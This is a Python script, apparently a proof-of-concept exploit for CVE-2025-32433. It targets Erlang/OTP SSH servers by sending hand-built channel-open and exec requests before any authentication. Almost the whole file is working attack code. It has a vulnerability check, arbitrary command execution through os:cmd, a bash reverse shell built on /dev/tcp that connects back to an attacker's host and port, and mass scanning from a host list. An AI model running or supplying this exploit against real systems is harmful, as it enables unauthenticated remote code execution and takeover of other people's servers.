import socket import struct import time import argparse import sys def string_payload(s): data = s.encode("utf-8") return struct.pack(">I", len(data)) + data def build_channel_open(channel_id=0): return ( b"\x5a" + string_payload("session") + struct.pack(">I", channel_id) + struct.pack(">I", 0x78000) + struct.pack(">I", 0x20000) ) def build_channel_request(channel_id=0, command=None): if command is None: command = 'erlang:node().' return ( b"\x62" + struct.pack(">I", channel_id) + string_payload("exec") + b"\x01" + string_payload(command) ) def build_kexinit(): cookie = b"\x00" * 16 def name_list(items): return string_payload(",".join(items)) return ( b"\x14" + cookie + name_list([ "curve25519-sha256", "ecdh-sha2-nistp256", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group14-sha256" ]) + name_list(["rsa-sha2-256", "rsa-sha2-512"]) + name_list(["aes128-ctr"]) * 2 + name_list(["hmac-sha1"]) * 2 + name_list(["none"]) * 2 + name_list([]) * 2 + b"\x00" + struct.pack(">I", 0) ) def pad_packet(payload, block_size=8): padding_min = 4 padding_len = block_size - ((len(payload) + 5) % block_size) if padding_len < padding_min: padding_len += block_size return ( struct.pack(">I", len(payload) + 1 + padding_len) + bytes([padding_len]) + payload + bytes([0] * padding_len) ) def is_vulnerable(host, port, timeout=5): try: with socket.create_connection((host, port), timeout=timeout) as s: print("[*] Connecting to target...") s.sendall(b"SSH-2.0-OpenSSH\r\n") banner = s.recv(1024) print(f"[+] Received banner: {banner.strip().decode()}") time.sleep(0.2) s.sendall(pad_packet(build_kexinit())) try: s.recv(4096) except socket.timeout: pass time.sleep(0.2) s.sendall(pad_packet(build_channel_open())) time.sleep(0.5) s.sendall(pad_packet(build_channel_request(command='erlang:node().'))) time.sleep(0.5) try: response = s.recv(1024) if response: print("[+] Server responded to unauthenticated channel message.") return True except Exception: pass print("[+] Connection stayed open after channel message.") return True except Exception as e: print(f"[-] Error: {e}") return False def exploit(host, port, command, timeout=5): try: with socket.create_connection((host, port), timeout=timeout) as s: print("[*] Connecting to target...") s.sendall(b"SSH-2.0-OpenSSH\r\n") banner = s.recv(1024) print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}") time.sleep(0.5) s.sendall(pad_packet(build_kexinit())) try: s.recv(4096) except socket.timeout: pass time.sleep(0.5) s.sendall(pad_packet(build_channel_open())) print(f"[+] Running command: {command}") time.sleep(0.5) s.sendall(pad_packet(build_channel_request(command=command))) print("[✓] Exploit sent. If vulnerable, command should execute.") return True except Exception as e: print(f"[-] Exploit failed: {e}") return False def generate_reverse_shell(ip, port): return ( f'os:cmd("bash -c \'exec 5<>/dev/tcp/{ip}/{port}; ' f'cat <&5 | while read line; do $line 2>&5 >&5; done\'").' ) def run_reverse_shell(host, port, lhost, lport, timeout=5): print(f"[*] Sending reverse shell to connect back to {lhost}:{lport}") command = generate_reverse_shell(lhost, lport) success = exploit(host, port, command, timeout) if success: print("[+] Reverse shell command sent. Check your listener.") else: print("[-] Failed to send reverse shell command.") return success def main(): parser = argparse.ArgumentParser(description="PoC for CVE-2025-32433") parser.add_argument("host", nargs="?", help="Target IP or hostname (ignored if -u is used)") parser.add_argument("-p", "--port", type=int, default=22, help="SSH port (default: 22)") parser.add_argument("-t", "--timeout", type=int, default=5, help="Connection timeout (default: 5s)") parser.add_argument("--command","-c", help="Custom command to run on target") parser.add_argument("--check", action="store_true", help="Only check if target is vulnerable") parser.add_argument("--shell", action="store_true", help="Launch a Bash-based reverse shell") parser.add_argument("--lhost", help="Your IP for reverse shell") parser.add_argument("--lport", type=int, default=4444, help="Your port for reverse shell (default: 4444)") parser.add_argument("-o", "--output", help="Output file to store results") parser.add_argument("-u", "--urlfile", help="File containing list of hosts to scan (one per line)") args = parser.parse_args() results = [] def process_host(host): port = args.port timeout = args.timeout output_lines = [] print(f"[*] Target: {host}:{port}") if args.check: if is_vulnerable(host, port, timeout): msg = f"[!!] {host}:{port} appears VULNERABLE to CVE-2025-32433" print(msg) output_lines.append(msg) return 0, output_lines else: msg = f"[-] {host}:{port} does not appear vulnerable." print(msg) output_lines.append(msg) return 1, output_lines if args.shell: if not args.lhost: msg = f"[-] --lhost is required for reverse shell. Skipping {host}:{port}." print(msg) output_lines.append(msg) return 1, output_lines success = run_reverse_shell(host, port, args.lhost, args.lport, timeout) return (0 if success else 1), output_lines if args.command: command = f'os:cmd("bash -c \'{args.command}\'").' success = exploit(host, port, command, timeout) return (0 if success else 1), output_lines if is_vulnerable(host, port, timeout): msg = f"[!!] {host}:{port} appears VULNERABLE to CVE-2025-32433" print(msg) output_lines.append(msg) return 0, output_lines else: msg = f"[-] {host}:{port} does not appear vulnerable." print(msg) output_lines.append(msg) return 1, output_lines exit_code = 0 if args.urlfile: try: with open(args.urlfile, "r") as f: hosts = [line.strip() for line in f if line.strip() and not line.strip().startswith("#")] except Exception as e: print(f"[-] Failed to read hosts from {args.urlfile}: {e}") return 1 for host in hosts: code, output_lines = process_host(host) results.extend(output_lines) if code != 0: exit_code = code else: if not args.host: print("[-] No host specified.") return 1 code, output_lines = process_host(args.host) results.extend(output_lines) if code != 0: exit_code = code if args.output: try: with open(args.output, "w") as outf: for line in results: outf.write(line + "\n") print(f"[+] Results written to {args.output}") except Exception as e: print(f"[-] Failed to write output to {args.output}: {e}") return exit_code if __name__ == "__main__": sys.exit(main())